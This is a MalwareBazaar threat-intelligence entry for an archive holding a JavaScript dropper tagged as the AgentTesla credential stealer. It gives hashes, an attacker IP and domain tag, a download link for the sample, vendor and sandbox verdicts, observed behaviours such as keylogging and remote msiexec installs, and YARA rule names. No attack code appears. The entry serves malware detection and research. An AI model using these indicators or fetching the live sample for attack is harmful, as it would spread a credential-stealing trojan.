MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AgentTesla

Vendor detections: 10

Intelligence 10 IOCs YARA 2 File information Comments

SHA256 hash:	6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c
SHA3-384 hash:	9ab6caa6a1e958ef34efbbe10b7c2ea460ee09b3dc50dd5c574d01b15e3d2d9a67764fdeb2900e8227a4002696173338
SHA1 hash:	68a39f9cfcb49fece31b9534d08d8bd26687937a
MD5 hash:	e0e3123c0047ed145b6743b40c80603c
humanhash:	fish-west-illinois-kansas
File name:	6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c.tar
Download:	download sample
Signature	AgentTesla Create hunting rule
File size:	10'827 bytes
First seen:	2026-04-15 09:56:24 UTC
Last seen:	Never
File type:	tar
MIME type:	application/x-rar
ssdeep	192:1jYJz/CoNeKqy9RdOMqtfpRkCzAk8pU6GJkhZTWs6hcMJHDWX:to/CoNefy9eMqtfpeCsNhuy96y
TLSH	T1B422BF89730707E3C6535539AD0A19D05C99833E78D17FB6ED7642A0D377B360CEAA48
TrID	61.5% (.RAR) RAR compressed archive (v5.0) (8000/1) 38.4% (.RAR) RAR compressed archive (gen) (5000/1)
Magika	rar
Reporter	JAMESWT_WT
Tags:	172-245-95-9 AgentTesla tar tecnoruoteindustriali-it

Intelligence

File Origin

# of uploads :

# of downloads :

Origin country :

File Archive Information

This file archive contains 1 file(s), sorted by their relevance:

File name:	IMG20260415-02271.js
File size:	23'216 bytes
SHA256 hash:	3a9019bc4d0b77313357a86ef0045b19ae35fd6eabe7f9a24eca7fe49bc6a2b5
MD5 hash:	eebdc958c0bcd9003bec0b9432713928
MIME type:	text/plain
Signature	AgentTesla

Vendor Threat Intelligence

Details

Link:

https://research.acce.ciphertechsolutions.com/results/f7993703-2369-40b2-a755-dda55adf26d4/

Detection(s):

Sanesecurity.Foxhole.JS_Rar_1.UNOFFICIAL

Sanesecurity.Malware.26863.JsHeur.UNOFFICIAL

SecuriteInfo.com.Suspicious-Rar-JS.UNOFFICIAL

Verdict:

Clean

Score:

89.3%

Link:

https://cyber-fortress.com/docs/result/index.php?id=69df568ef68adfe1003a009e

Tags:

n/a

Verdict:

Malicious

Threat level:

10/10

Confidence:

100%

Tags:

fingerprint repaired

Link:

https://www.filescan.io/uploads/69df60d1799d5bf325ff6a44/reports/56ca1535-6e12-46bf-bafa-8f60c62c723a/overview

Verdict:

Malicious

Labled as:

HEUR/Suspar.Generic

Link:

https://www.hybrid-analysis.com/sample/6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c

Verdict:

Malicious

File Type:

rar

First seen:

2026-04-15T05:44:00Z UTC

Last seen:

2026-04-16T11:46:00Z UTC

Hits:

~10

Detections:

Trojan.JS.SAgent.sb UDS:DangerousObject.Multi.Generic HEUR:Trojan.Script.Generic HEUR:Trojan-Downloader.Script.Generic HEUR:Trojan.Script.SAgent.gen

Link:

https://opentip.kaspersky.com/6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c/results?tab=lookup

Gathering data

Detection:

n/a

Link:

https://mwdb.cert.pl/sample/6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c/

Verdict:

Malicious

Threat:

Family.GULOADER

Link:

https://tip.neiki.dev/file/6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c

Threat name:

Win32.Trojan.Qwexlafiba

Status:

Malicious

First seen:

2026-04-15 07:39:55 UTC

File Type:

Binary (Archive)

Extracted files:

AV detection:

10 of 24 (41.67%)

Threat level:

5/5

Detection(s):

Suspicious file

Link:

https://check.spamhaus.org/check/?searchterm=nqqclfm3o7bzldxr7afqnjrt5xdesyy3hwlfg3pr56qppoc45ywa._file

Result

Malware family:

agenttesla

Score:

10/10

Tags:

family:agenttesla adware discovery execution keylogger persistence privilege_escalation spyware stealer trojan

Link:

https://tria.ge/reports/260415-mmszdabz8p/

Behaviour

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Event Triggered Execution: Installer Packages

System Location Discovery: System Language Discovery

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates connected drives

Looks up external IP address via web service

Checks computer location settings

Use of msiexec (install) with remote resource

Badlisted process makes network request

Family: AgentTesla

Please note that we are no longer able to provide a coverage score for Virus Total.

Threat name:

Malicious File

Score:

0.75

Link:

https://yomi.yoroi.company/submissions/6c2025959b77c3958ef1f80b06a633edc649631b3d96536df1efa0f7b85cee2c

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:	Guloader_Heuristic_VBS_A Create hunting rule
Author:	Ankit Anubhav - ankitanubhav.info
Description:	Heuristic to detect 2023 Guloader variant

Rule name:	Sus_CMD_Powershell_Usage Create hunting rule
Author:	XiAnzheng
Description:	May Contain(Obfuscated or no) Powershell or CMD Command that can be abused by threat actor(can create FP)

File information

The table below shows additional information about this malware sample such as delivery method and external references.

No further information available

Comments

Login required

You need to login to in order to write a comment. Login with your abuse.ch account.

No comments found for this malware sample